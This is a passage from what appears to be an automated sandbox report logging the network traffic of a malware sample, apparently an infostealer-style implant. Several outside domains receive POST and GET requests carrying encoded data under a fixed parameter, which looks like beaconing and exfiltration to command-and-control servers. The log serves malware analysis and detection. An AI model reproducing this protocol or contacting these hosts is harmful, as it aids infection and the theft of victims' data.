Jan 15, 2025 19:41:41.288460016 CET	10911	OUT	POST /tc4z/ HTTP/1.1 Host: www.jackys.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.jackys.shop Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.jackys.shop/tc4z/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 71 77 66 37 49 69 43 49 66 5a 65 34 56 53 46 61 6a 45 76 56 69 71 71 61 6c 58 59 47 65 53 31 45 6c 51 79 72 53 49 4e 6c 53 62 4d 76 76 75 32 74 46 6f 30 50 78 44 64 75 74 34 42 75 63 52 79 39 49 4d 34 59 77 77 42 6e 30 35 6a 53 56 38 6d 79 69 33 61 30 63 63 45 42 6f 2f 4b 31 79 66 49 6c 2b 51 6f 46 54 48 4d 4f 43 35 33 7a 4f 6c 32 72 57 30 32 33 78 4a 75 6e 61 59 43 30 41 54 6a 38 56 35 35 68 4e 5a 50 4c 47 46 58 75 54 42 4d 64 44 32 4f 64 65 4f 76 79 61 61 4c 53 71 65 44 36 48 43 44 57 71 50 34 59 49 5a 53 4d 6f 51 52 38 46 7a 38 44 78 38 4f 6a 6f 65 7a 52 6e 45 70 56 48 64 73 38 77 69 6b 75 44 4f 2b 68 68 4f 30 71 44 41 38 7a 64 35 66 4a 74 43 69 38 57 55 39 4a 6c 6a 74 62 79 51 48 73 72 73 70 70 77 58 35 5a 42 6e 6f 6f 34 6c 65 4c 6b 33 4f 6f 49 51 4b 6c 58 36 5a 35 79 45 51 36 6b 74 33 77 58 63 65 7a 6e 4e 4b 75 76 4b 4c 79 61 74 4e 51 6a 74 43 57 4d 6b 71 50 63 41 45 6f 4b 4c 2f 4b 70 72 64 73 42 5a 78 71 48 71 4b 33 61 6b 30 2b 6d 4c 43 2f 75 67 45 46 39 78 4d 52 4d [TRUNCATED] Data Ascii: PZtTT8P0=qwf7IiCIfZe4VSFajEvViqqalXYGeS1ElQyrSINlSbMvvu2tFo0PxDdut4BucRy9IM4YwwBn05jSV8myi3a0ccEBo/K1yfIl+QoFTHMOC53zOl2rW023xJunaYC0ATj8V55hNZPLGFXuTBMdD2OdeOvyaaLSqeD6HCDWqP4YIZSMoQR8Fz8Dx8OjoezRnEpVHds8wikuDO+hhO0qDA8zd5fJtCi8WU9JljtbyQHsrsppwX5ZBnoo4leLk3OoIQKlX6Z5yEQ6kt3wXceznNKuvKLyatNQjtCWMkqPcAEoKL/KprdsBZxqHqK3ak0+mLC/ugEF9xMRMdGHY9/iGpzCM2VDywYvsVvNlleIzEiOQylvvE8Ape3fH1xuqgTar8BnWi9AMickwY8IU2mdPSebwnDig8OBgJindxIQjQSbK33fGISwxVVv7VfYumg2MlPc/MquUHTNkhosxmNYV0aIv1vepKDCyO0lNxPZ8gjOcMDyejTKh0Kh2ZkhEcaJpl44lTG2G0tBkzJht2JtcQHk7WxwqhgsH67igOyyN/AWszxrDNwvPK9wcC1ixcLgrmzdPkLeUD7RDstpjzAf3gmfj3pzVXzE+kb1hlqYvJNmKwEcJEAWS2/gEcG/Z9sdaNXcENeIIdGTYeZebNiRHTVO58q4K2Rxywb1eL3EadDJq5jFrckdslV27Mjg/JmskGnl3XzIfiYMcciZe8jJ+h5J39zkJJdXFHgM7o11XWvZduQDHRjZTsjyKEcgS64vx5updJQgcxt/ikVGjfyS+KIPddDQTscP90NYz2eGZdMPvMbqqC5QRoRzqwsBZiNa6jbVNHwJQ6o3hTuaeHBQFI0aVV70+GZVXQZBT6nkQI+5KPgTzafnxh1938Tcx/oyKgsXpdH00xA3BLDfDhxfSvRrOkEOw/2rxJUaudHWhEYqXma5FRy5grNNOpDJ/m44mkSvdonn+jFEerk5eayd8/qs52uDvizw6NBl1D5iB4r1xS/ [TRUNCATED]
Jan 15, 2025 19:41:41.914681911 CET	200	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Wed, 15 Jan 2025 18:41:41 GMT Server: Apache Cache-Control: no-cache Location: https://jackys.shop/tc4z/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	64441	217.160.0.207	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:43.828107119 CET	551	OUT	GET /tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS8kP4gBJ8eOTYb+e2w2GS9Rfuczm284n9HscOXcNPb7iGn3oZX2z0bs=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.jackys.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:41:44.458853006 CET	351	IN	HTTP/1.1 302 Found Content-Type: text/html Content-Length: 0 Connection: close Date: Wed, 15 Jan 2025 18:41:44 GMT Server: Apache Cache-Control: no-cache Location: https://jackys.shop/tc4z/?PZtTT8P0=ny3bLW3OcbOKXixzoTTFtaWz9zwbCAlCkXueetxIQf0InYmFA4wH3zQZz5ZeXWajS8kP4gBJ8eOTYb+e2w2GS9Rfuczm284n9HscOXcNPb7iGn3oZX2z0bs=&-HT0=eZZx0LUhp4u8Nb7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	64442	136.243.64.147	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:49.555042982 CET	839	OUT	POST /bdcw/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.100millionjobs.africa Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.100millionjobs.africa/bdcw/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 6e 59 76 33 41 6e 56 56 78 4a 45 41 48 55 64 45 56 2f 47 71 55 44 30 47 4a 7a 49 77 6f 67 53 62 30 6e 7a 70 45 55 78 57 61 78 66 64 4e 36 62 42 32 38 78 63 4f 77 71 32 5a 74 32 30 4d 45 33 51 74 64 56 34 6e 67 32 4d 54 53 6e 54 62 79 65 78 75 6a 54 52 79 47 6f 75 44 52 45 46 79 38 56 79 63 43 74 35 2f 62 43 62 2b 70 4b 44 52 61 4b 2f 53 52 38 52 42 31 35 2b 43 70 6d 4f 5a 4a 5a 65 77 69 4c 6f 48 36 44 58 73 2b 42 4a 47 52 4d 49 2b 4a 31 75 6b 74 58 31 39 52 50 6d 37 34 61 65 2f 5a 34 4d 45 64 7a 50 78 6b 68 43 36 64 50 55 33 36 50 2b 33 6e 4c 45 56 58 4f 4e 48 6a 6a 58 68 41 3d 3d Data Ascii: PZtTT8P0=nYv3AnVVxJEAHUdEV/GqUD0GJzIwogSb0nzpEUxWaxfdN6bB28xcOwq2Zt20ME3QtdV4ng2MTSnTbyexujTRyGouDREFy8VycCt5/bCb+pKDRaK/SR8RB15+CpmOZJZewiLoH6DXs+BJGRMI+J1uktX19RPm74ae/Z4MEdzPxkhC6dPU36P+3nLEVXONHjjXhA==
Jan 15, 2025 19:41:50.284336090 CET	493	IN	HTTP/1.1 302 Found Date: Wed, 15 Jan 2025 18:41:50 GMT Server: Apache Location: http://maximumgroup.co.za/bdcw/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 62 64 63 77 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/bdcw/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	64443	136.243.64.147	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:52.097152948 CET	859	OUT	POST /bdcw/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.100millionjobs.africa Connection: close Content-Length: 225 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.100millionjobs.africa/bdcw/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 6e 59 76 33 41 6e 56 56 78 4a 45 41 57 41 68 45 58 65 47 71 44 54 30 4a 56 6a 49 77 7a 51 54 63 30 6e 76 70 45 56 30 4c 61 6a 72 64 4e 59 7a 42 77 4e 78 63 4a 77 71 32 53 4e 32 78 52 55 33 6c 74 63 70 4b 6e 6b 71 4d 54 53 7a 54 62 32 61 78 76 53 54 4f 67 47 6f 73 50 78 45 44 32 38 56 79 63 43 74 35 2f 62 57 78 2b 70 43 44 52 72 61 2f 54 77 38 53 43 31 35 39 42 70 6d 4f 4f 5a 5a 53 77 69 4c 47 48 37 65 77 73 34 4e 4a 47 51 63 49 2b 37 64 68 74 74 58 7a 79 78 4f 55 39 6f 50 41 7a 49 30 4e 4d 65 69 76 76 48 56 42 2f 62 43 4f 6d 4c 75 70 6c 6e 76 33 49 51 48 35 4b 67 65 65 36 41 61 42 39 37 65 44 6d 6f 7a 44 6f 75 49 75 70 45 72 6a 65 2f 55 3d Data Ascii: PZtTT8P0=nYv3AnVVxJEAWAhEXeGqDT0JVjIwzQTc0nvpEV0LajrdNYzBwNxcJwq2SN2xRU3ltcpKnkqMTSzTb2axvSTOgGosPxED28VycCt5/bWx+pCDRra/Tw8SC159BpmOOZZSwiLGH7ews4NJGQcI+7dhttXzyxOU9oPAzI0NMeivvHVB/bCOmLuplnv3IQH5Kgee6AaB97eDmozDouIupErje/U=
Jan 15, 2025 19:41:52.743319035 CET	493	IN	HTTP/1.1 302 Found Date: Wed, 15 Jan 2025 18:41:52 GMT Server: Apache Location: http://maximumgroup.co.za/bdcw/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 62 64 63 77 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/bdcw/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	64444	136.243.64.147	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:54.641722918 CET	10941	OUT	POST /bdcw/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.100millionjobs.africa Connection: close Content-Length: 10305 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.100millionjobs.africa/bdcw/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 6e 59 76 33 41 6e 56 56 78 4a 45 41 57 41 68 45 58 65 47 71 44 54 30 4a 56 6a 49 77 7a 51 54 63 30 6e 76 70 45 56 30 4c 61 6a 54 64 4d 70 54 42 7a 75 5a 63 49 77 71 32 66 74 32 77 52 55 33 43 74 64 42 4f 6e 6a 6a 78 54 52 4c 54 61 54 4f 78 6f 6d 48 4f 71 47 6f 73 48 52 45 47 79 38 56 6a 63 47 78 39 2f 62 47 78 2b 70 43 44 52 6f 79 2f 43 68 38 53 4f 56 35 2b 43 70 6d 4b 5a 4a 59 37 77 69 54 77 48 34 79 4b 76 49 74 4a 49 52 73 49 74 59 31 68 6d 74 58 78 33 78 4f 4d 39 6f 54 68 7a 4d 56 30 4d 64 2f 34 76 41 39 42 79 76 58 72 31 70 69 55 33 6e 37 6f 51 43 50 30 47 41 2b 72 37 41 75 6b 38 66 75 59 78 4a 7a 75 69 4f 41 6c 39 45 48 64 63 36 45 70 36 67 56 33 57 42 45 33 76 7a 30 5a 41 38 71 57 50 34 47 66 53 47 71 58 46 34 73 69 35 78 73 70 78 57 75 6b 38 62 50 72 67 44 68 7a 6d 6b 66 46 52 34 58 4e 76 65 77 33 67 53 46 61 50 76 54 30 43 49 37 38 39 6f 73 62 6a 76 72 33 42 2f 2b 57 63 53 34 50 37 6a 74 42 55 49 6b 36 45 33 79 54 2b 71 41 6a 65 73 72 6c 4b 42 30 57 4b 33 44 4d 6d [TRUNCATED] Data Ascii: PZtTT8P0=nYv3AnVVxJEAWAhEXeGqDT0JVjIwzQTc0nvpEV0LajTdMpTBzuZcIwq2ft2wRU3CtdBOnjjxTRLTaTOxomHOqGosHREGy8VjcGx9/bGx+pCDRoy/Ch8SOV5+CpmKZJY7wiTwH4yKvItJIRsItY1hmtXx3xOM9oThzMV0Md/4vA9ByvXr1piU3n7oQCP0GA+r7Auk8fuYxJzuiOAl9EHdc6Ep6gV3WBE3vz0ZA8qWP4GfSGqXF4si5xspxWuk8bPrgDhzmkfFR4XNvew3gSFaPvT0CI789osbjvr3B/+WcS4P7jtBUIk6E3yT+qAjesrlKB0WK3DMmOIKDjMjV1cxPiQELkw10suGvmT/B1u8P/awca8nJzcz+mMPAZqRUSbjYCTU3gOZ8Ngs+qKV2GEMfW5W9U6foRYYknj9G/pzZ2CT9id9Nq2ZHchSh2wZJAI5LDl9VFoi0P4MIP/9l13cOfmKURtM0R3bkUwcjR9Guj7hBbqO2DlAE0+8ycCXO4Da6ulrwBpJtyJXwk9800YiARA4HPPJFkwCafxiCT/HlvEPurxNluY+6xIIaYgkHzTX+iCw/RanUrMpGIkkDWBKOlIwTR0uXV45C1CLcSJXlXNl3jIkG/pfoRairgG/hhDPqCD0g+/LlLFVwA89FjFTH3IC4zoQ9b481XiBAd9sdESATD8zhyi5rs6riybbHh8y1FTJWLlQNSbL4wr0UBYNqxCsjWAkU3Og4Tr9uxqmeq3gvZhy5lA+lZv0+FSL4umnTb9G8Q2yKvZN7X7S2TfjlvvBADFSQA0QMWv51K0w4lxK1uF3jq+oBI8FwxX7CYzz7ZKtMdpQk9grdcRxuowcqLjvrE5sBtqcZj1rNsm4zAs2/AcheqsAwiw3K7rcCu4ZzVBcA8DKwH5zvz98+E80Q0h2VZuQokfiSO8ghR2LtRJ97sGw/ZfCLqOFkLjS+oiTx6tIW3s7/9ItGDUa2c8Sf3sdWD/j+sOKMqWH9t0RBg+ [TRUNCATED]
Jan 15, 2025 19:41:55.289519072 CET	493	IN	HTTP/1.1 302 Found Date: Wed, 15 Jan 2025 18:41:55 GMT Server: Apache Location: http://maximumgroup.co.za/bdcw/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 62 64 63 77 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/bdcw/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	64445	136.243.64.147	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:41:57.184545040 CET	561	OUT	GET /bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMKpOinIiMZClj3zM1CqZGG9lmLXrV5MIhxFycB6Ix5Y/8KR9paRaaTHbT0ZPxs=&-HT0=eZZx0LUhp4u8Nb7 HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Jan 15, 2025 19:41:57.826334953 CET	799	IN	HTTP/1.1 302 Found Date: Wed, 15 Jan 2025 18:41:57 GMT Server: Apache Location: http://maximumgroup.co.za/bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMKpOinIiMZClj3zM1CqZGG9lmLXrV5MIhxFycB6Ix5Y/8KR9paRaaTHbT0ZPxs=&-HT0=eZZx0LUhp4u8Nb7 Content-Length: 445 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 62 64 63 77 2f 3f 50 5a 74 54 54 38 50 30 3d 71 61 48 58 44 58 59 78 32 4c 6b 71 55 68 52 67 45 64 4f 4f 58 77 6b 74 55 53 59 62 75 6a 75 31 71 57 33 6f 49 57 51 50 42 33 71 45 4d 72 37 34 6d 75 52 6d 46 41 4f 2f 61 4d 4b 70 4f 69 6e 49 69 4d 5a 43 6c 6a 33 7a 4d 31 43 71 5a 47 47 39 6c 6d 4c 58 72 56 35 4d 49 68 78 46 79 63 42 36 49 78 35 59 2f 38 4b 52 39 70 61 52 61 61 54 48 62 54 30 5a 50 78 73 3d 26 61 6d 70 3b 2d 48 54 30 3d 65 5a 5a 78 30 4c 55 68 70 34 75 38 4e 62 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/bdcw/?PZtTT8P0=qaHXDXYx2LkqUhRgEdOOXwktUSYbuju1qW3oIWQPB3qEMr74muRmFAO/aMKpOinIiMZClj3zM1CqZGG9lmLXrV5MIhxFycB6Ix5Y/8KR9paRaaTHbT0ZPxs=&-HT0=eZZx0LUhp4u8Nb7">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	64446	162.218.30.235	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
Jan 15, 2025 19:42:03.412322998 CET	806	OUT	POST /t4o7/ HTTP/1.1 Host: www.l33900.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: http://www.l33900.xyz Connection: close Content-Length: 205 Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Referer: http://www.l33900.xyz/t4o7/ User-Agent: Mozilla/5.0 (Linux; U; Android 2.3.6; en-au; GT-S5830i Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1 Data Raw: 50 5a 74 54 54 38 50 30 3d 6a 4c 69 68 72 46 51 46 44 66 72 4a 32 73 67 41 6c 42 39 74 54 4a 42 74 56 53 57 38 59 5a 39 6c 4c 51 33 44 62 44 46 2f 51 4e 45 59 63 4d 64 30 77 35 59 78 7a 56 41 58 31 67 4b 49 76 39 6e 74 34 72 6f 31 79 50 76 52 36 33 37 58 54 56 41 72 4b 49 38 6e 6e 65 36 66 30 2f 2b 69 6e 76 73 62 44 4a 31 67 46 7a 66 33 58 31 59 6e 4b 51 36 78 6a 50 6c 69 2f 64 59 71 72 4a 35 68 44 47 68 34 67 41 71 38 64 59 4f 68 41 70 6b 41 77 6f 43 44 61 4b 71 64 4e 38 55 43 52 37 46 4a 57 43 69 63 39 74 58 64 2b 48 49 48 44 4f 44 4c 6a 39 6d 34 30 57 39 2f 43 35 30 30 4d 59 52 64 4b 72 33 6f 55 41 3d 3d Data Ascii: PZtTT8P0=jLihrFQFDfrJ2sgAlB9tTJBtVSW8YZ9lLQ3DbDF/QNEYcMd0w5YxzVAX1gKIv9nt4ro1yPvR637XTVArKI8nne6f0/+invsbDJ1gFzf3X1YnKQ6xjPli/dYqrJ5hDGh4gAq8dYOhApkAwoCDaKqdN8UCR7FJWCic9tXd+HIHDODLj9m40W9/C500MYRdKr3oUA==
Jan 15, 2025 19:42:03.953442097 CET	455	IN	HTTP/1.1 302 Redirect Content-Type: text/html; charset=UTF-8 Location: https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/ Server: Microsoft-IIS/10.0 Date: Wed, 15 Jan 2025 18:42:03 GMT Connection: close Content-Length: 200 Data Raw: 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e e6 96 87 e6 a1 a3 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e e5 af b9 e8 b1 a1 e5 b7 b2 e7 a7 bb e5 8a a8 3c 2f 68 31 3e e5 8f af e5 9c a8 3c 61 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 78 2e 6c 6f 6e 67 77 61 79 73 75 6e 2e 63 6f 6d 2f 61 70 70 2f 72 65 67 69 73 74 65 72 2e 70 68 70 3f 73 69 74 65 5f 69 64 3d 32 32 33 39 26 61 6d 70 3b 74 6f 70 49 64 3d 36 34 38 31 39 2f 74 34 6f 37 2f 22 3e e6 ad a4 e5 a4 84 3c 2f 61 3e e6 89 be e5 88 b0 e8 af a5 e6 96 87 e6 a1 a3 3c 2f 62 6f 64 79 3e Data Ascii: <head><title></title></head><body><h1></h1><a HREF="https://wx.longwaysun.com/app/register.php?site_id=2239&topId=64819/t4o7/"></a></body>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	64447	162.218.30.235	80	5236	C:\Program Files (x86)\YCRIsUHDWrNbkRXMzeGcsahUMUSqSnoZrCZzdnRxqtNSRtuRWWmlapICLWWtbkGMMOPQbB\xTzxorEdKnFN.exe

Timestamp	Bytes transferred	Direction	Data
